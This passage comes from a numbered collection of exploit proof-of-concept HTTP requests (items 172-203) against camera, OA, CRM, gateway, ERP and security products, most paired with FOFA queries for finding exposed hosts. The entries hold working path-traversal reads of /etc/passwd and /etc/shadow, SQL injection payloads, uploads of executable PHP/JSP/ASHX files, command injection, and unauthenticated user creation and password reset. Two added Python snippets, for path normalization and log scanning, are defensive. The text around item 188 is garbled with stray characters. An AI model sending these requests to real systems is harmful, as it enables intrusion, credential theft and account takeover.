User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Most HTTP clients collapse a leading /../ before sending; use one that transmits the path verbatim (for example curl --path-as-is) when checking this.

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

The traversal sits in the POST body, not the URL, so a plain access log shows only a POST to /clients/MyCRL; confirming an attempt needs a full-request capture.

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Request the configuration file matching the device model (one path per model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the uploaded file. Note that the stored name comes from the form field name (12234.txt), not from filename, and that the %2e%2e in the path resolves to /imc/flexFileUpload:
GET /imc/primepush/%2e%2e/flex/12234.txt

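The traversal entries above (items 160, 172 and 173) all depend on a client-supplied path that only escapes the intended directory after percent-decoding and normalization, while item 178 works the other way round: its %2e%2e keeps the path inside the web root but normalizes it to a different route than the one a prefix-based filter saw. The following Python is an added example written for this page, not code from any of the listed products; the web root /srv/www is an assumption and the sample paths are copied from the requests above.

```python
import posixpath
from urllib.parse import unquote

# Request paths copied from the entries above; which ones escape the root is the question.
SAMPLE_PATHS = {
    "nexus_160": "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "dt_camera_172": "/../../../../etc/passwd",
    "checkpoint_173": "aCSHELL/../../../../../../../etc/shadow",
    "h3c_imc_178": "/imc/primepush/%2e%2e/flexFileUpload",
    "benign": "/static/css/app.css",
}


def fully_decode(path, max_rounds=3):
    """Percent-decode until the value stops changing, so %252e-style double
    encoding cannot smuggle '..' past a check that looks at the raw string."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze(client_path, root="/srv/www"):
    """Resolve a client-supplied path against an assumed web root.

    Returns the resolved filesystem path, whether it left the root, and whether
    normalization changed the route (the item 178 case: the path stays inside
    the root, but a filter keyed on the raw prefix saw a different URL than the
    one that is actually served)."""
    decoded = fully_decode(client_path).replace("\\", "/")
    relative = decoded.lstrip("/")          # every value is treated as root-relative
    resolved = posixpath.normpath(posixpath.join(root, relative))
    inside = resolved == root or resolved.startswith(root.rstrip("/") + "/")
    if inside:
        route = "/" if resolved == root else "/" + posixpath.relpath(resolved, root)
    else:
        route = None
    return {
        "resolved": resolved,
        "escapes_root": not inside,
        "route": route,
        "route_rewritten": inside and route != "/" + relative,
    }


def safe_open_path(client_path, root="/srv/www"):
    """What a file-serving handler should do: refuse anything outside root and
    work with the resolved path, never with the client's string."""
    result = analyze(client_path, root)
    if result["escapes_root"]:
        raise PermissionError(f"{client_path!r} resolves outside {root}")
    return result["resolved"]


if __name__ == "__main__":
    for name, path in SAMPLE_PATHS.items():
        print(f"{name:15} {analyze(path)}")
```

Two conclusions follow from running it: a file handler must decide on the resolved path (the first three samples all end in /etc), and an authorization filter must run after normalization, because the item 178 path is inside the root yet names /imc/flexFileUpload, not the /imc/primepush/ prefix it appears to start with.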
179. Jianwen (建文) project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based probe in the xu parameter: on a vulnerable MySQL backend the result of user() is returned between the ~ markers of the updatexml XPATH error.

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based probe: a vulnerable backend leaks 12345654321 (111111*111111) in the ORA error text. The endpoint is a password-change function, so use a throwaway loginid when verifying.

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes as posted, creating a root user with privilege level 4.

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query with a file write: the unhex() literal decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and INTO OUTFILE writes it to .\..\..\WebRoot\plom.xgi. Whether that file executes depends on the server's handler mapping for .xgi, so check for the file's presence as well as for the md5 output.

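For the defensive use this article is written for, the request lines in this section can be turned into a log check. The Python below is an added example (not part of the original article or of any listed product): it scans access-log lines in combined format for the request-line markers of items 156, 160, 169, 177 and 185 and for the time-based and error-based SQL probes used throughout this section (items 171, 175, 180, 181, 183, 186, 187, 189). The log lines are constructed for the example and the label names are my own. Payloads carried in a POST body (items 154, 173, 186) never reach an access log, so for item 173 only the path is matched, as a lead for follow-up rather than a confirmed hit.

```python
import re
from urllib.parse import unquote_plus

# Signatures distilled from the request lines in this section (label names are mine).
# Each regex runs against "<method> <target>" after two rounds of percent-decoding and
# lower-casing, so case tricks and %25-double-encoding do not hide a match.
SIGNATURES = [
    ("tbk-dvr-cmd-injection", re.compile(r"/device\.rsp\?.*\bcmd=___s_o_s_t_r_e_a_max___")),  # item 156
    ("h3c-cfg-read",          re.compile(r"/userlogin\.asp/\.\./.*\.cfg$")),                   # item 177
    ("path-traversal",        re.compile(r"(^|/)\.\.(/|$)")),                                   # items 160, 169, 172
    ("sql-time-based",        re.compile(r"waitfor\s+delay|pg_sleep\s*\(|\bsleep\s*\(|randomblob\s*\(")),
    ("sql-error-based",       re.compile(r"updatexml\s*\(|ctxsys\.drithsx\.sn")),             # items 180, 183
    ("sql-outfile-write",     re.compile(r"\binto\s+outfile\b")),                               # item 185
    # Item 173 carries its traversal in the POST body, which an access log does not record;
    # the path alone is a weak signal, labelled for follow-up rather than as a confirmed hit.
    ("checkpoint-mycrl-post", re.compile(r"^post /clients/mycrl(\?|$)")),
]

# Combined log format: ip ident user [time] "METHOD target version" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log for this example; the request lines mirror the entries above.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2024:10:01:02 +0800] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=ls%20-l%20%2Fvar HTTP/1.1" 200 512
203.0.113.7 - - [05/Jun/2024:10:01:09 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1893
198.51.100.4 - - [05/Jun/2024:10:02:15 +0800] "GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" 200 0
198.51.100.4 - - [05/Jun/2024:10:02:40 +0800] "GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1" 200 20480
198.51.100.4 - - [05/Jun/2024:10:03:01 +0800] "POST /clients/MyCRL HTTP/1.1" 200 1024
192.0.2.10 - - [05/Jun/2024:10:03:30 +0800] "GET /static/css/app.css HTTP/1.1" 200 3120
"""


def normalize(method, target):
    """Decode twice and lower-case; the subject every signature is matched against."""
    decoded = unquote_plus(unquote_plus(target))
    return f"{method.lower()} {decoded.lower()}"


def classify(method, target):
    """Return the signature labels that match one request line."""
    subject = normalize(method, target)
    return [label for label, rx in SIGNATURES if rx.search(subject)]


def scan(log_text):
    """Return one record per log line that matches at least one signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue        # not in the expected format; a real job would count these
        labels = classify(m["method"], m["target"])
        if labels:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "labels": labels})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], ",".join(hit["labels"]), hit["target"])
```

The time-based labels only say that a probe was sent, not that it succeeded; pair them with the response-time field if the log has one, since a five-second outlier on a request carrying WAITFOR DELAY or SLEEP(5) is the actual confirmation.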
186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

Heavy-query time-based probe for SQLite: hashing a 250 MB RANDOMBLOB stalls a vulnerable backend, so compare response times with and without the payload.

187. Mura CMS processAsyncObject SQL injection (same CVE as item 158, time-based payload)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

, v. }: H- c& V/ H/ A$ s188. 叁体-佳会视频会议 attachment 任意文件读取
+ m# p* V* p# m/ H% ]version <= 3.9.7
2 L5 C  \3 r* d+ {6 Z$ `FOFA:body="/system/get_rtc_user_defined_info?site_id"
6 b/ V9 e  G* e: u7 j6 DGET /attachment?file=/etc/passwd HTTP/1.12 p1 f0 ?9 I/ ~/ r7 u, a9 c
Host: your-ip. O' k; b, J0 Z/ A% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" Y" `! X% ~& B9 U$ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 G7 c) t: R: j8 L5 p* v7 ?( B( hAccept-Encoding: gzip, deflate1 N1 F5 Y% w8 A1 u' A
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 i! _( ^& ?6 a& QConnection: close/ s- K! q8 ?: |/ x# f
8 u) G2 I: S) s6 v* l5 i5 @
0 {& M0 B6 F" ^
189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
